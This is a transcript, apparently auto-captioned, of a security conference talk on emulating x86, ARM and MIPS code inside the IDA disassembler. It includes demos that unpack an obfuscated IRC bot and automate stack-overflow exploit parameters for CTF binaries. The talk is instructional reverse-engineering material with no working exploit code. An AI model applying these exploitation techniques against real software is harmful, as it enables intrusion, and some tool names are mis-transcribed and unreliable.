Windows, that’s primarily 00:26:45.637,00:26:50.642 related to QEMU’s dependence on g-lim. Which is not found on 00:26:52.845,00:26:55.547 Windows platforms, right unless you reach out and find something 00:26:55.547,00:27:00.652 like sig-win right, or ming, right and install the requisite 00:27:00.652,00:27:05.123 libraries out of those uh particular utilities. So, this 00:27:05.123,00:27:08.827 complicates uh, windows builds – in fact they don’t have windows 00:27:08.827,00:27:12.831 built into their continuous integration uh, when you uh, go 00:27:12.831,00:27:16.301 observe how the project is uh – the state of the project out 00:27:16.301,00:27:19.571 there on github site. So it makes building on Windows a 00:27:19.571,00:27:24.843 little bit tough, but it can be overcome and in the end you’re 00:27:24.843,00:27:28.680 able to integrate uh, Unicorn into IDA on all the platforms 00:27:28.680,00:27:34.353 for which IDA is available. All right. [Clears throat] It’s 00:27:34.353,00:27:36.255 about all I’m going to talk about on a high level – it’s 00:27:36.255,00:27:39.124 pretty straight forward: Here’s a – here’s a disassembler; 00:27:39.124,00:27:44.263 here’s an emulator; and uh it either works or it doesn’t. So 00:27:44.263,00:27:47.599 we’ll see. I’m going to go through some demos, and show you 00:27:47.599,00:27:51.370 what it looks like. Uh, I’m going to start off with uh, some 00:27:51.370,00:27:54.006 simple de-obfuscation stuff. I’m going to show it to you in a 00:27:54.006,00:27:55.874 couple of different ways. I’m going to go through it fairly 00:27:55.874,00:27:58.944 quickly, okay I’m not going to try – I’m going to try not to 00:27:58.944,00:28:02.281 get bogged down into the details of IDAisms or how to use IDA, or 00:28:02.281,00:28:04.149 things like that. I’m just going to show you what each of these 00:28:04.149,00:28:08.220 things do, what they look like uh, and uh, let you form your 00:28:08.220,00:28:12.758 own opinions as to the utility of each, and perhaps whether you 00:28:12.758,00:28:16.528 prefer one approach to another. So, if this all works out I’m 00:28:16.528,00:28:19.498 going to use this old-style emulator. Lets see. I have to 00:28:19.498,00:28:25.370 pick the right version of IDA. Okay, we’ll do this one. Right, 00:28:25.370,00:28:28.640 so you might recognise this section name, this is just a UPX 00:28:28.640,00:28:33.145 pack binary. Okay, if all goes well here okay I’m going to 00:28:33.145,00:28:39.551 bring up this old emulator – please work. Okay, it’s coming, 00:28:39.551,00:28:44.556 my machine is slow. This is an example of uh, the original x86 00:28:48.293,00:28:52.598 emulator that I did in IDA [Chuckles] Good jokes, front 00:28:52.598,00:28:58.270 row? Okay, and what you’re going to see here, assuming this 00:28:58.270,00:29:03.208 works, is a, a crude like debugger uh, console, that’s 00:29:03.208,00:29:06.144 going to come up. We’re not going to leave IDA’s static user 00:29:06.144,00:29:09.681 interface. I’m not happy with this. Uh, and we’re going to be 00:29:09.681,00:29:15.687 able to emulate through IDA with uh, without leaving it’s common 00:29:15.687,00:29:20.692 interface here, unless it never comes up. Awesome. Okay, while 00:29:23.061,00:29:29.701 that’s going on we may as well start the other one. Okay. 00:29:29.701,00:29:34.906 Behind this door, we going to try do this with Box, okay IDA’s 00:29:34.906,00:29:39.478 Box plugin. So, in order to do that, we’ve got to switch our 00:29:39.478,00:29:43.348 debugger over and you see IDA offers a number of debuggers. 00:29:43.348,00:29:46.785 It’s context aware; what platform you’re running IDA on 00:29:46.785,00:29:50.055 and the nature of the binary uh, that you’re loading up. So you 00:29:50.055,00:29:53.458 can see one of these is a local Box debugger, right. And 00:29:53.458,00:29:56.728 assuming I haven’t messed this up either, and still have Box 00:29:56.728,00:30:02.100 installed properly, right if I choose Box as a debugger. Oh, 00:30:02.100,00:30:05.904 that doesn’t do anything; we’ve got to actually run it right? 00:30:05.904,00:30:08.740 So, I’ll set a breakpoint at the beginning of the code here, I’ll 00:30:08.740,00:30:12.978 set a breakpoint down towards the end over here. Okay, we’re 00:30:12.978,00:30:15.414 not going to jump out and execute any of these functions 00:30:15.414,00:30:19.317 call, because they jump out into Windows libraries. We’ll just 00:30:19.317,00:30:21.987 set a breakpoint down here at the end, maybe bring up a 00:30:21.987,00:30:25.791 strings view - try to convince you that it’s actually doing 00:30:25.791,00:30:30.128 work. Right, all these strings, I don’t know if that shows up at 00:30:30.128,00:30:33.065 all, uh, but these are the obfuscated strings that are part 00:30:33.065,00:30:36.134 of the binary. You can see bits and pieces of strings, but it’s 00:30:36.134,00:30:41.139 not fully de-obfuscated. And if Box lets me do this… ah… then, 00:30:50.348,00:30:55.353 we can start debugging, and this is going to toggle into… maybe… 00:31:01.460,00:31:05.330 a Segway back to the other demo. There’s Box- there’s Box 00:31:05.330,00:31:08.433 starting up. I’ve got too much going on, on this machine. And 00:31:08.433,00:31:14.172 so, IDA started up Box. It’s got this IPC channel between the 00:31:14.172,00:31:17.776 two, okay. So now IDA gives us a debugger view – we’re not really 00:31:17.776,00:31:21.713 running the process. Okay, all the – all the emulation data has 00:31:21.713,00:31:24.683 been stuffed into Box, and Box is going to do its thing. But 00:31:24.683,00:31:27.085 this is just a standard IDA debugger view, if you’re running 00:31:27.085,00:31:29.888 a process and actually attached to it, this is what you’d see. 00:31:29.888,00:31:32.991 It’s not the best user interface in the world, it's probably the- 00:31:32.991,00:31:36.194 the number one knock against using IDA as a debugger, right, 00:31:36.194,00:31:39.131 is it’s user interface. It’s not great, but we can step through 00:31:39.131,00:31:44.102 it. Right, and the register state updates up here and so on. 00:31:44.102,00:31:47.773 Right, and we can let it run, and we should hit our second 00:31:47.773,00:31:50.342 break point at some point down there, and we can go back and 00:31:50.342,00:31:55.046 look at the strings on the binary. And, maybe if I did this 00:31:55.046,00:31:59.985 right… right, you’re just going to have to trust me. I need one 00:32:09.694,00:32:14.699 of those things. [Audience laughs] >> [Inaudible response] 00:32:21.306,00:32:22.674 >> [Speaker laughs] Yeah. Wow, I’ve just got to pull these 00:32:22.674,00:32:28.480 strings out of Box’s memory. Al right, lets see how our other 00:32:28.480,00:32:30.882 thing is doing. Look at that. It’s like a cooking show; you’ve 00:32:30.882,00:32:34.352 got a couple of things in the oven at one time, right. So this 00:32:34.352,00:32:37.889 is ... the emulated view, right. IDA x86 emu, totally different 00:32:37.889,00:32:43.328 view – we never leave uh, the uh, normal IDA interface, and 00:32:43.328,00:32:46.097 you’ve got this tiny little panel that pops up, right. It’s 00:32:46.097,00:32:49.568 very specific to x86, so taking this approach with other 00:32:49.568,00:32:52.804 architecture you’d have to come up with our own interface, 00:32:52.804,00:32:55.607 right, and replace all the x86 registers with whatever 00:32:55.607,00:32:59.778 registers you have for that particular architecture. It lets 00:32:59.778,00:33:03.014 you do some things like manipulate memory. Memory is 00:33:03.014,00:33:05.584 really just the database; everything you’re manipulating 00:33:05.584,00:33:08.854 is just a change to the database. Right and you’re just 00:33:08.854,00:33:11.990 – that’s your memory story; you fetch bites out of the database, 00:33:11.990,00:33:14.559 you emulate them, you modify the database if that’s what it says 00:33:14.559,00:33:18.630 to do, Uh, but again, it’s destructive, right. So, we can 00:33:18.630,00:33:21.967 sit here, and I can click on you know step, step and it’s hard to 00:33:21.967,00:33:25.570 see but, if you watch the blue here… it doesn’t really 00:33:25.570,00:33:29.808 highlight… that blue is stepping through various instructions and 00:33:29.808,00:33:32.677 will jump down and follow through and so on. And I can 00:33:32.677,00:33:38.083 reach down into the same binary… okay which is down here before 00:33:38.083,00:33:44.923 these function calls, set a breakpoint and say ‘run’. And 00:33:44.923,00:33:50.128 this is much slower than Box, because actually it’s… all the 00:33:50.128,00:33:52.697 interactions with the IDA database are pretty slow, but we 00:33:52.697,00:33:55.967 hit our breakpoint and we can go back to our strings window, and 00:33:55.967,00:34:00.906 set this thing back up again. Oh, and we should have lots of 00:34:06.011,00:34:11.016 interesting strings, right. Like this. And this is just an old 00:34:13.718,00:34:16.254 IRC bot, but we got all these strings out of it because it’s 00:34:16.254,00:34:20.325 mostly de-obfuscated. And then you say you’re done. Right, we 00:34:20.325,00:34:24.863 close this up and you go back here and in fact what was 00:34:24.863,00:34:29.134 formally empty space is now a code that we can go and 00:34:29.134,00:34:32.637 disassemble. We didn’t hop into our debugger, we’ve destroyed 00:34:32.637,00:34:35.840 our database, right, it doesn’t look like it use to look, okay, 00:34:35.840,00:34:38.410 but we’ve got de-obfuscated code, and we just continue with 00:34:38.410,00:34:41.746 this point doing a static analysis. Okay, so it’s a quick 00:34:41.746,00:34:44.983 in and out and I considered that approach, but for the user 00:34:44.983,00:34:48.920 interface aspect of it, okay, I might have gone that way. Now 00:34:48.920,00:34:54.426 let's see if Box is behaving for us. Over on the Box side, we’ve 00:34:54.426,00:34:59.431 got- hopefully got the same strings… somewhere. Yeah, look 00:35:02.701,00:35:07.706 at all this library code. I have no idea why that’s even coming. 00:35:28.893,00:35:33.131 No, oh yeah here we go. Right, and so here are it again, it’s 00:35:33.131,00:35:35.867 an IRC bot and you can see registry keys in there that it’s 00:35:35.867,00:35:39.304 going to reference, and so on. So we get the same result, but 00:35:39.304,00:35:44.042 we have a modified IDA database [Inaudible]. Okay, so it’s like 00:35:44.042,00:35:47.979 a running process, okay and I would have to then extract this 00:35:47.979,00:35:53.652 from Box back into IDA, right if I wanted to make this data 00:35:53.652,00:35:59.424 permanent. So, this is again the approach that I took, and now 00:35:59.424,00:36:02.027 we’ll go do this a different way. And this is where you 00:36:02.027,00:36:06.031 thought those demos were bad. Let’s see how we do here. Set a 00:36:06.031,00:36:10.101 breakpoint up here, try to set a breakpoint same place down here. 00:36:10.101,00:36:15.106 Okay. And this time I’m going to switch my debugger over, and if 00:36:19.177,00:36:23.782 it’s installed appropriately, it’ll show up as School Debug. 00:36:23.782,00:36:30.355 So we do this… okay. We go back up here to the beginning and we 00:36:30.355,00:36:35.093 try to kick this off. Hopefully I hit my first breakpoint. Okay, 00:36:35.093,00:36:38.997 and then the plugin looks a lot like Box, right. So, but this is 00:36:38.997,00:36:43.401 Unicorn handling this particular emulation. Okay, so you get 00:36:43.401,00:36:48.173 register state over here, right just like you do in Box, and any 00:36:48.173,00:36:51.743 other debugger and so on. And at this point we can just step 00:36:51.743,00:36:57.449 through, and it tracks along and I can let it run. And we’ll do 00:36:57.449,00:37:02.387 the whole strings trick… see if we get anything interesting. 00:37:05.590,00:37:09.561 Okay, right now there’s not much but name of a couple of 00:37:09.561,00:37:13.665 libraries that get imported. Then we go back over here and we 00:37:13.665,00:37:19.471 let it run, just hit ‘go’ here. Hit our breakpoint. Come back, 00:37:19.471,00:37:24.476 rerun strings... okay, and like the other two emulators, now 00:37:28.780,00:37:33.151 we’ve got all of these right, strings extracted from memory 00:37:33.151,00:37:38.590 and if we go down to the bottom of the uh, self decoding loop we 00:37:38.590,00:37:42.727 can jump up, and very much like Box, right this is the extracted 00:37:42.727,00:37:44.796 code which we can then turn into code right up here in our 00:37:44.796,00:37:48.166 emulator, or in the debugging session. But, again I don’t have 00:37:48.166,00:37:53.138 that back in my database, and when I go to quit this, I’m 00:37:53.138,00:37:56.474 right back where I started from, okay. And I don’t have any 00:37:56.474,00:38:01.913 strings, and if I follow the jump right, up here you can see 00:38:01.913,00:38:06.151 it’s empty. Right, because this is the region in the binary that 00:38:06.151,00:38:09.854 it unpacks itself into. Right, so it’s it’s very much like a 00:38:09.854,00:38:13.091 debugger and not a static over-write or whatever you might 00:38:13.091,00:38:18.463 like to call it, okay. So that’s it emulating on 32 bit x86 code 00:38:18.463,00:38:22.767 on 64 bit Windows. Let’s see what else I think I’m going to 00:38:22.767,00:38:26.938 do, okay. Local arm emulation, so Windows platform; no network 00:38:26.938,00:38:31.376 connections, no arm hardware, okay. Somewhere I’ve got an arm 00:38:31.376,00:38:37.148 binary open, okay. Let’s see where this one comes from. Let 00:38:37.148,00:38:43.321 me find the right binary… there we go. Okay, it’s an arm binary 00:38:43.321,00:38:46.457 from an old DefCon ‘capture the flag’, shout out to legit BS, 00:38:46.457,00:38:51.462 right, okay, uh, one of their first CTF’s. But uh, arm- arm 00:38:54.699,00:38:59.504 binary on Windows, okay, and… actually it’s not going to offer 00:38:59.504,00:39:02.640 me any debugger, because IDA has no clue what to do with this, 00:39:02.640,00:39:06.244 right. ELF binary, Arm, Windows, right – don’t do ELF, don’t do 00:39:06.244,00:39:10.648 ARM, okay, but the debugger recognises the architecture at 00:39:10.648,00:39:13.651 least, so it says ‘I’m available” And it’s the only 00:39:13.651,00:39:16.187 debugger that says it's available, so IDA has already 00:39:16.187,00:39:22.126 selected it up there. And we can kick this off. And, now we’re 00:39:22.126,00:39:25.663 debugging arm, more or less emulation. Don’t worry about 00:39:25.663,00:39:32.537 that [Chuckles] Awesome, um, see where it goes on. So there’s 00:39:32.537,00:39:36.274 some memory mapping problems there, let’s see if… yeah, not 00:39:36.274,00:39:42.547 going to work. Clapping for my crash, it’s all … look at that… 00:39:42.547,00:39:44.549 We’ll just pass all these exceptions on, it looks like 00:39:44.549,00:39:47.218 it's just advancing, maybe it’s even updating registers. Okay. 00:39:47.218,00:39:52.924 Uh, r2 is actually equal to one at this point. [Mumbling] look 00:39:52.924,00:39:57.729 at that, yeah, okay. Uh, I left this open and it had some stale 00:39:57.729,00:40:01.399 state and I think it's not happy with me, okay. But that’s the 00:40:01.399,00:40:05.203 idea right – we’re in a debugging session uh, and we can 00:40:05.203,00:40:08.539 jump in and out of this without having to fire up an arm 00:40:08.539,00:40:12.610 environment, okay, do any remote communications… so a remote arm, 00:40:12.610,00:40:16.047 a device, and then when we’re done we step out and we’re back 00:40:16.047,00:40:22.787 in our IDA disassembly session, okay. What else? Oh! Now, MIPS, 00:40:22.787,00:40:27.792 lets see. MIPS I don’t even have any idea how to read, okay. So, 00:40:33.131,00:40:35.366 somebody out there probably says that’s MIPS, so I don’t know, 00:40:35.366,00:40:41.773 right. IDA thinks it’s MIPS. Again, no MIPS debugger on IDA, 00:40:41.773,00:40:44.809 I can’t switch my debuggers, right there’s no other debugger 00:40:44.809,00:40:50.581 option so you can see that… No, don’t do that… Right, School 00:40:50.581,00:40:56.321 Debug is, is selected, okay. So we try to hip ‘GO’ here, and, 00:40:56.321,00:41:01.893 hopefully we hit our breakpoint from which maybe we can step, 00:41:01.893,00:41:03.995 although I don’t have a stack, so this is probably a bad 00:41:03.995,00:41:08.299 choice, let’s see. Step. Step. Step. Step. Right, and we’re 00:41:08.299,00:41:13.271 emulating our way through MIPS code. Okay. Yes, 5 minutes, 00:41:13.271,00:41:18.643 great, because I am tired. Okay, so we hop out of that and we’re 00:41:18.643,00:41:21.412 again back to our disassembly view. Okay, and I’m not going to 00:41:21.412,00:41:24.115 go into the ways you integrate, you know, what you have 00:41:24.115,00:41:26.284 available in your disassembly view and what you have available 00:41:26.284,00:41:28.686 in your static view. But, suffice to say, there’s ways to 00:41:28.686,00:41:32.757 pull information back across, if you decide that it’s useful for 00:41:32.757,00:41:36.527 augmenting what you have on the static side. Last thing I’m 00:41:36.527,00:41:42.967 going to do is take a look at uh, one of the challenges from 00:41:42.967,00:41:49.240 DefCon qualifier this year. Okay, and what this was, was a 00:41:49.240,00:41:54.445 binary that [Clears Throat] they gave you a thousand of them. 00:41:54.445,00:41:59.984 Okay, and when you went to interact with the competition, 00:41:59.984,00:42:04.322 right, they as- you had one minute, right, to craft an 00:42:04.322,00:42:08.292 exploit for one of these thousand binaries that they gave 00:42:08.292,00:42:11.429 you the file name for. So, you downloaded a thousand binaries, 00:42:11.429,00:42:13.831 and you had a minute to craft the exploit. So, it’s going to 00:42:13.831,00:42:17.602 take a long time to do all those by hand, okay, so you want to 00:42:17.602,00:42:19.804 automate this and you want to have an answer in your hip 00:42:19.804,00:42:23.141 pocket when they say “Give me your exploit for binary number 00:42:23.141,00:42:28.279 one.” Okay, so how do you automate? Well it turns out that 00:42:28.279,00:42:32.116 all of these binaries have roughly the same pattern, and 00:42:32.116,00:42:34.886 I’ll describe it, not by looking at the code, but by looking at 00:42:34.886,00:42:39.290 the stack and there’s two buffers in here, okay. And all 00:42:39.290,00:42:43.394 of the binaries differ in the location of that user input 00:42:43.394,00:42:47.632 buffer in the stack relative to the same return address; the 00:42:47.632,00:42:51.736 size of that user input buffer in the stack; and then the 00:42:51.736,00:42:55.406 contents that gets placed into what I call a canary string, 00:42:55.406,00:42:59.510 right there. So they gave you a free overwrite out of that user 00:42:59.510,00:43:02.547 input buffer, but you have to figure out ‘how much do I have 00:43:02.547,00:43:07.618 to overwrite to clobber EIP’ okay, and after you’ve done 00:43:07.618,00:43:10.755 that, which is not a problem, there’s nothing hindering the 00:43:10.755,00:43:14.926 overwrite, but they come back and verify that the canary 00:43:14.926,00:43:17.595 string matches the original canary that they’ve placed in 00:43:17.595,00:43:20.031 there. So as you do your overwrite, you’ve got to rewrite 00:43:20.031,00:43:22.200 the canary in there and it better match the original 00:43:22.200,00:43:26.204 string. But all thousand binaries have a different canary 00:43:26.204,00:43:29.240 and it’s not always obvious exactly the way they set it, 00:43:29.240,00:43:32.376 right, they copy it, they copy it one bite at a time, they do a 00:43:32.376,00:43:35.313 string copy, they do it a lot of different ways, okay. But they 00:43:35.313,00:43:39.550 always end up doing a string compare at the end. So, if you 00:43:39.550,00:43:44.088 can put a breakpoint at the sting compare, right, and hit 00:43:44.088,00:43:46.324 it, it doesn’t matter what you fill the buffer with, you can do 00:43:46.324,00:43:48.526 some other computations to figure out the distance from the 00:43:48.526,00:43:51.662 start of your buffer, say EIP, set a breakpoint on the string 00:43:51.662,00:43:55.433 compare, look at the required article sitting on the stack, 00:43:55.433,00:43:58.936 and pick that out and these become your parameters. What’s 00:43:58.936,00:44:02.974 my canary got to be; right how long is it from EIP all the way 00:44:02.974,00:44:05.543 down to the uh, buffer? And there’s a couple other 00:44:05.543,00:44:07.645 constancies’ you needed to pick out, but I didn’t want to do 00:44:07.645,00:44:10.581 this a thousand times by hand – nobody did. And there’s some 00:44:10.581,00:44:14.752 good write-ups about using some other automated systems to solve 00:44:14.752,00:44:18.689 this, but what I did was I scripted up this emulator, and 00:44:18.689,00:44:22.860 the emulator… lets see… somewhere the script exists, 00:44:22.860,00:44:26.597 down here these things because this is implemented as an IDA 00:44:26.597,00:44:31.002 emulator, right, you get all of IDA’s debugger scripting – I’m 00:44:31.002,00:44:33.838 sorry – IDA debugger, all of IDA’s debugger scripting can be 00:44:33.838,00:44:37.108 used to drive this thing, right. So we write the script, we load 00:44:37.108,00:44:40.011 the debugger, we set some debugger option to break on 00:44:40.011,00:44:43.447 start, we run through the start address, right, we do some 00:44:43.447,00:44:48.252 things, okay, we get the value of EIP, and I’m picking out all 00:44:48.252,00:44:51.856 of the arguments, all of the bits-and-pieces from a dynamic 00:44:51.856,00:44:54.258 environment, although I’m not actually running a process, I’m 00:44:54.258,00:44:58.162 just emulating through it. And by the time I get done to down 00:44:58.162,00:45:01.232 by the bottom, I’ve picked out a bunch of parameters that I’m 00:45:01.232,00:45:04.969 going to need. And, what I did was I just took those parameters 00:45:04.969,00:45:08.906 and wrote them out as a python dictionary entry, and so I had a 00:45:08.906,00:45:12.043 dictionary of parameters – when they told me what binary to 00:45:12.043,00:45:17.114 exploit, I said “Ah, I made my key into my dictionary is the 00:45:17.114,00:45:19.951 name of the binary I pick out the parameters, right, and I 00:45:19.951,00:45:23.354 craft my buffer and fire it out”. Okay, and what that looks 00:45:23.354,00:45:29.293 like is this. Okay, we run IDA in batch mode, okay and then 00:45:29.293,00:45:34.532 I’ll be done, I promise. You’ve got this one, and then we’ve got 00:45:34.532,00:45:39.537 which one…? This one. Okay, so I’ve got two windows right here, 00:45:48.346,00:45:52.316 I tailing an output file on the bottom, okay, I’m going to use 00:45:52.316,00:45:55.853 IDA in batch mode – you can see the long command line there. 00:45:55.853,00:45:58.656 And, what I’m going to do is I’m going to run that script that I 00:45:58.656,00:46:01.225 wrote, and I’m going to run it against one of these thousand 00:46:01.225,00:46:03.594 binaries – well in this directory there’s 300 of them, 00:46:03.594,00:46:06.297 and they all scroll up like that. We’ll see if this will 00:46:06.297,00:46:10.401 work. [Inauble] Make sure I clean out some stale files – 00:46:10.401,00:46:15.406 wait a minute I’ve got it. Kill that IDA session because… It’s 00:46:18.409,00:46:23.414 going to get in the way of… the batch run, and we'll try this 00:46:27.852,00:46:31.355 out. You’ll see IDA files you have to look in the background, 00:46:31.355,00:46:35.693 if everything works. So, IDA’s coming in batch mode, we’re in 00:46:35.693,00:46:38.462 debugger mode, it’s done you can see the output down at the 00:46:38.462,00:46:42.600 bottom. Right, that quickly… It got into and emulation on that 00:46:42.600,00:46:47.304 ELF binary, okay, ran through main, picked out the parameters 00:46:47.304,00:46:49.940 it needed and dumped them out to me – now I wrap that in a little 00:46:49.940,00:46:51.942 loop, do it for every file in the current directory, and I’ve 00:46:51.942,00:46:54.779 got my thousand exploit parameters, and I’m ready to 00:46:54.779,00:46:59.784 connect to the remote site. [Audience applause] Okay, so for 00:47:06.624,00:47:09.660 the future and very quickly: Better user interface on 00:47:09.660,00:47:11.862 launching the emulator it would be nice to be able to specify 00:47:11.862,00:47:14.832 some register state – right now I just take a guess. Right, 00:47:14.832,00:47:17.201 where do you want to start your emulation? Do you want your- any 00:47:17.201,00:47:19.570 register to have particular value? So, I’d like to have that 00:47:19.570,00:47:24.442 done up. Uh, some options for mapping into particular memory 00:47:24.442,00:47:28.045 regions; loading other regions. Uh, if you’re familiar with IDA 00:47:28.045,00:47:30.414 and debuggers there’s a very useful interface called 00:47:30.414,00:47:34.251 ‘AppCall’ that just- that actually lets you incorporate 00:47:34.251,00:47:38.556 uh, functions or call them almost natively from IDA python, 00:47:38.556,00:47:40.891 right call out and have your function run and then spit the 00:47:40.891,00:47:43.928 value back to you in your scripts. Uh, I’d like to have a 00:47:43.928,00:47:47.364 hooking library, to be able to hook various functions and to 00:47:47.364,00:47:50.067 things maybe other than what the emulator is doing, or provide 00:47:50.067,00:47:54.371 shims for library calls or system calls, things like that. 00:47:54.371,00:47:57.975 And, uh also perhaps add the option to go ahead and pull in 00:47:57.975,00:48:01.045 all of the shared libraries uh, that a dynamic [Inaudible] 00:48:01.045,00:48:04.715 library might link to, so you can follow the library calls 00:48:04.715,00:48:07.351 down into a shared library function and emulate your way 00:48:07.351,00:48:10.755 through those if you wanted to do so, rather than writing all 00:48:10.755,00:48:13.991 the shims for them. Uh, it’s out there on GitHub, it’s out there 00:48:13.991,00:48:17.228 today. Uh, I will push all the latest changes shortly after the 00:48:17.228,00:48:20.264 Con. Uh, but if you’re interested, uh, I’m always 00:48:20.264,00:48:22.867 interested in feedback. If you want to collaborate, I’d love to 00:48:22.867,00:48:27.104 hear from you. If you have ideas on features that might make it 00:48:27.104,00:48:29.740 more useful, and you don’t want to implement them, at least 00:48:29.740,00:48:32.309 share them with me and maybe I’ll get around to them or find 00:48:32.309,00:48:37.248 somebody uh, who might like to implement any of your ideas. And 00:48:37.248,00:48:41.018 that’s it. And I’m happy to take any questions, or if not- if no 00:48:41.018,00:48:45.923 question, please enjoy the rest of your conference. [Audience 00:48:45.923,00:48:52.129 applause] Thank you. Uh, do we have microphones somewhere for 00:48:52.129,00:48:54.732 questions? Yeah [mumbles] I’m supposed to direct you to a 00:48:54.732,00:48:58.435 microphone, so it gets picked up. You can come by. You want to 00:48:58.435,00:49:02.373 come up here? >> [Inaudible] >> Microphone is… oh, it’s right 00:49:02.373,00:49:07.678 here. It’s right over here. Drink - don’t forget your drink. 00:49:07.678,00:49:12.983 That’s right. >> [Clears throat] Hello. Uh, a couple of slides 00:49:12.983,00:49:15.619 back, you mentioned uh, two console apple windows… >> That’s 00:49:15.619,00:49:18.022 the wrong way. >> How do you recognize what magic 4 bytes 00:49:18.022,00:49:23.127 overwrite EIP and how do you deal with bad characters? >> Uh, 00:49:23.127,00:49:27.131 when I was doing the scripted demo? So, what I did was in the 00:49:27.131,00:49:30.000 scripted demo, what I had to do is I had to study a couple of 00:49:30.000,00:49:32.403 the binaries manually, right. Not a thousand of them, but I 00:49:32.403,00:49:35.272 looked at two or three of them – looked at the first one and said 00:49:35.272,00:49:37.842 “Well this is clearly an easy stack overflow” I understand 00:49:37.842,00:49:40.411 that if it was just this one exactly how I would exploit it. 00:49:40.411,00:49:42.546 Then I looked at another one and I said: Oh this one is subtly 00:49:42.546,00:49:46.684 different. What’s different about it, and can I develop an 00:49:46.684,00:49:50.554 analysis that walks through the program and at certain key 00:49:50.554,00:49:54.525 points in the program picks off certain things for me. Okay, so 00:49:54.525,00:49:56.961 what are the parameters? What is that buffer getting copied? 00:49:56.961,00:50:00.364 Really uh, the string copy- or the string compare give it all 00:50:00.364,00:50:02.900 always, it tells me the start of the user buffer and the start of 00:50:02.900,00:50:05.836 the canary buffer, and from there what I can do is do some 00:50:05.836,00:50:11.475 math to figure out where say EIP was. Okay, third binary, right – 00:50:11.475,00:50:13.811 all of these things again looking similar, and so I took 00:50:13.811,00:50:16.780 what I learned from looking at three binaries, developed an 00:50:16.780,00:50:19.950 automated process that I would apply to the three binaries and 00:50:19.950,00:50:23.320 then it extended nice and neatly through the thousand binaries, 00:50:23.320,00:50:26.123 which was roughly what the intended. Okay, and what they 00:50:26.123,00:50:29.660 wanted to do was force you to do it quickly. Right, so you 00:50:29.660,00:50:32.796 weren’t going to be able to try reverse engineer all thousand to 00:50:32.796,00:50:34.465 develop these answers, you wouldn’t have finished in the 00:50:34.465,00:50:37.868 weekend. So I don’t- does that answer your question? >> Yeah, 00:50:37.868,00:50:40.604 yeah. No, I’m assuming that that’s the logic you have to 00:50:40.604,00:50:43.574 hardcode into the program, or does it auto detect that? >>Uh, 00:50:43.574,00:50:46.477 that the logic that you have to bake into the script that you 00:50:46.477,00:50:51.548 write. So, through here, right, are some various things that I 00:50:51.548,00:50:55.352 was looking for, [Inaudible] extracting some register values, 00:50:55.352,00:50:59.023 I’m stepping one instruction at a time, I’m asking you know “Am 00:50:59.023,00:51:01.058 I at certain types of instructions”, I’m counting the 00:51:01.058,00:51:04.862 number of calls, okay, that I’ve encountered, because the third 00:51:04.862,00:51:08.032 call down the chain was going to be the stir copy, and when I got 00:51:08.032,00:51:11.335 to the stir copy - right or the string compare you can- you can 00:51:11.335,00:51:13.537 see what I’m doing is I’m picking some arguments off the 00:51:13.537,00:51:16.774 stack, right that have been placed there [Inaudible] passing 00:51:16.774,00:51:20.878 through the string compare and then I- I’m using that to derive 00:51:20.878,00:51:24.081 all the information I need to craft the exploit parameters. >> 00:51:24.081,00:51:27.051 Okay, awesome. Thank you. >> Sure, any other questions? 00:51:27.051,00:51:29.987 You’re trying to get me out of here? I think we’re done. Thanks 00:51:29.987,00:51:32.923 very much. I’d- I’d be happy to talk to you at the side of the 00:51:32.923,00:51:36.260 stage. Thank you. [Audience Applause]